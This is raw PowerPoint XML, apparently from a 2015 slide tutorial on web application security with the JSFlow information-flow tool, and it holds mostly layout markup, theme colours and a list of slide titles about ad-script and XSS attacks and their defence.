      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Rak 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4490554" y="1719072"/>
            <a:ext cx="5246" cy="48722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Bildobjekt 21" descr="imgres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717" y="2965420"/>
            <a:ext cx="800354" cy="80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Bildobjekt 24" descr="imgr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847" y="3863516"/>
            <a:ext cx="741793" cy="741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Bildobjekt 25" descr="j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304" y="3531392"/>
            <a:ext cx="664247" cy="664247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Bildobjekt 26" descr="1366511188978779390free-red-cloud-advertising-m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394" y="5335570"/>
            <a:ext cx="676048" cy="676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Bildobjekt 27" descr="analytics-icon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771" y="5335570"/>
            <a:ext cx="672527" cy="672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9" name="Rak pil 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6088211" y="4540250"/>
            <a:ext cx="407839" cy="79532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Rak pil 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6679035" y="4605309"/>
            <a:ext cx="0" cy="62117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Frihandsfigur 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7078428" y="3358758"/>
            <a:ext cx="903613" cy="472194"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 903613 w 903613"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 472194"/>
              <a:gd name="connsiteX1" fmla="*/ 276782 w 903613"/>
              <a:gd name="connsiteY1" fmla="*/ 162826 h 472194"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 903613"/>
              <a:gd name="connsiteY2" fmla="*/ 472194 h 47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3613" h="472194">
                <a:moveTo>
                  <a:pt x="903613" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="665498" y="42063"/>
                  <a:pt x="427384" y="84127"/>
                  <a:pt x="276782" y="162826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126180" y="241525"/>
                  <a:pt x="0" y="472194"/>
                  <a:pt x="0" y="472194"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Rak pil 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5313194" y="3043528"/>
            <a:ext cx="1309856" cy="102682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" name="Bildobjekt 32" descr="imgres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240" y="2327932"/>
            <a:ext cx="800354" cy="80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Bildobjekt 33" descr="jQurery.gi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052" y="2502738"/>
            <a:ext cx="462682" cy="462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Bildobjekt 34" descr="modernizr-sticker.jpg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3667" r="963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36" t="18638" r="4562" b="17732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6110442" y="2502738"/>
            <a:ext cx="664624" cy="462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6" name="textruta 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4710979" y="2046482"/>
            <a:ext cx="68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CDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="textruta 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900134" y="3765774"/>
            <a:ext cx="101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party</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="textruta 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6813692" y="263299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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="textruta 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7186357" y="5498090"/>
            <a:ext cx="1198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parties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Bildobjekt 22" descr="imgres.jpg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614" y="4325404"/>
            <a:ext cx="502123" cy="50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Bildobjekt 23" descr="search.png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614" y="3735132"/>
            <a:ext cx="504000" cy="50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0" name="Rak pil 39"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5666968" y="3975425"/>
            <a:ext cx="771879" cy="2589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Rak pil 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5678420" y="4325404"/>
            <a:ext cx="760427" cy="21484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900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utnät">
  <a:themeElements>
    <a:clrScheme name="Rutnät">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="534949"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="CCD1B9"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="C66951"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="BF974D"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="928B70"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="87706B"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="94734E"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="6F777D"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="CC9900"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="C0C0C0"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Rutnät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Rutnät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175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3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3000"/>
                <a:satMod val="11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30264</TotalTime>
  <Words>4299</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Bildspel på skärmen (4:3)</PresentationFormat>
  <Paragraphs>829</Paragraphs>
  <Slides>78</Slides>
  <Notes>78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Bildrubriker</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>78</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="79" baseType="lpstr">
      <vt:lpstr>Rutnät</vt:lpstr>
      <vt:lpstr>Web application security using jsflow</vt:lpstr>
      <vt:lpstr>What is a web application?</vt:lpstr>
      <vt:lpstr>What is a Web app? </vt:lpstr>
      <vt:lpstr>What is a Web app? </vt:lpstr>
      <vt:lpstr>What is a Web app? </vt:lpstr>
      <vt:lpstr>The Web app</vt:lpstr>
      <vt:lpstr>PowerPoint-presentation</vt:lpstr>
      <vt:lpstr>Enabling Technology</vt:lpstr>
      <vt:lpstr>Architecture of web applications</vt:lpstr>
      <vt:lpstr>Newspaper case study</vt:lpstr>
      <vt:lpstr>SvD partial overview (AUGust 2015)</vt:lpstr>
      <vt:lpstr>Our security focus: confidentiality</vt:lpstr>
      <vt:lpstr>Confidentiality of user data</vt:lpstr>
      <vt:lpstr>Confidentiality of user data</vt:lpstr>
      <vt:lpstr>accidental data leaks</vt:lpstr>
      <vt:lpstr>Accidental data leaks</vt:lpstr>
      <vt:lpstr>Example: S-Pankki</vt:lpstr>
      <vt:lpstr>What could possibly go wrong?</vt:lpstr>
      <vt:lpstr>What can included scripts access?</vt:lpstr>
      <vt:lpstr>What can included scripts access?</vt:lpstr>
      <vt:lpstr>Security goal of this tutorial</vt:lpstr>
      <vt:lpstr>content injection</vt:lpstr>
      <vt:lpstr>Attack 1: Content injection</vt:lpstr>
      <vt:lpstr>Content injection</vt:lpstr>
      <vt:lpstr>For ads, Problem solved?</vt:lpstr>
      <vt:lpstr>Cross site scripting</vt:lpstr>
      <vt:lpstr>Attack 2: Cross site scripting</vt:lpstr>
      <vt:lpstr>XSS (still) an issue?</vt:lpstr>
      <vt:lpstr>CONCLUSION: access control is not enough!</vt:lpstr>
      <vt:lpstr>Information flow contRol</vt:lpstr>
      <vt:lpstr>Information flow control</vt:lpstr>
      <vt:lpstr>Information flow control</vt:lpstr>
      <vt:lpstr>IFC example policy</vt:lpstr>
      <vt:lpstr>Practical security</vt:lpstr>
      <vt:lpstr>JSFlow</vt:lpstr>
      <vt:lpstr>Meet the raven</vt:lpstr>
      <vt:lpstr>Hrafn overview</vt:lpstr>
      <vt:lpstr>OUR challenge – attack raven</vt:lpstr>
      <vt:lpstr>Inside HRAFN </vt:lpstr>
      <vt:lpstr>Malicious ad client</vt:lpstr>
      <vt:lpstr>Attack 1: Malicious ad client</vt:lpstr>
      <vt:lpstr>Malicious ad client</vt:lpstr>
      <vt:lpstr>Malicious ad</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Attack 1: Malicious ad client</vt:lpstr>
      <vt:lpstr>ATTACK 1: Malicious ad Client</vt:lpstr>
      <vt:lpstr>Current protection</vt:lpstr>
      <vt:lpstr>JSFlow – the ad attack</vt:lpstr>
      <vt:lpstr>Cross site scritping</vt:lpstr>
      <vt:lpstr>Malicious user - XSS</vt:lpstr>
      <vt:lpstr>An XSS attack</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Performing the attack</vt:lpstr>
      <vt:lpstr>Falling for the attack</vt:lpstr>
      <vt:lpstr>Aww, snap!</vt:lpstr>
      <vt:lpstr>Current protection</vt:lpstr>
      <vt:lpstr>JSFlow – the XSS attack</vt:lpstr>
      <vt:lpstr>Under the hood</vt:lpstr>
      <vt:lpstr>IFC in practice – the ad attack</vt:lpstr>
      <vt:lpstr>IFC in practice – the XSS attack</vt:lpstr>
      <vt:lpstr>But, You say, isn’t that taint tracking?</vt:lpstr>
      <vt:lpstr>Is taint tracking enough?</vt:lpstr>
      <vt:lpstr>Laundering – the need for full IFC</vt:lpstr>
      <vt:lpstr>conclusions</vt:lpstr>
      <vt:lpstr>What to take home</vt:lpstr>
      <vt:lpstr>What to take home</vt:lpstr>
      <vt:lpstr>My personal view</vt:lpstr>
      <vt:lpstr>The bigger picture</vt:lpstr>
      <vt:lpstr>The cloud and the WEB app</vt:lpstr>
      <vt:lpstr>IFC on the client side</vt:lpstr>
      <vt:lpstr>client side End-to-end security</vt:lpstr>
      <vt:lpstr>Systemwide end-to-end security</vt:lpstr>
      <vt:lpstr>Systemwide end-to-end security</vt:lpstr>
      <vt:lpstr>Systemwide security and JSFlow</vt:lpstr>
      <vt:lpstr>What we didn’t talk about</vt:lpstr>
      <vt:lpstr>System wide policies</vt:lpstr>
      <vt:lpstr>The future of jsflow/tortoise</vt:lpstr>
      <vt:lpstr>The end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App Security</dc:title>
  <dc:creator>default</dc:creator>
  <cp:lastModifiedBy>default</cp:lastModifiedBy>
  <cp:revision>1067</cp:revision>
  <cp:lastPrinted>2015-09-19T14:20:10Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-07-21T13:49:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-09-23T07:53:10Z</dcterms:modified>
</cp:coreProperties>
</file>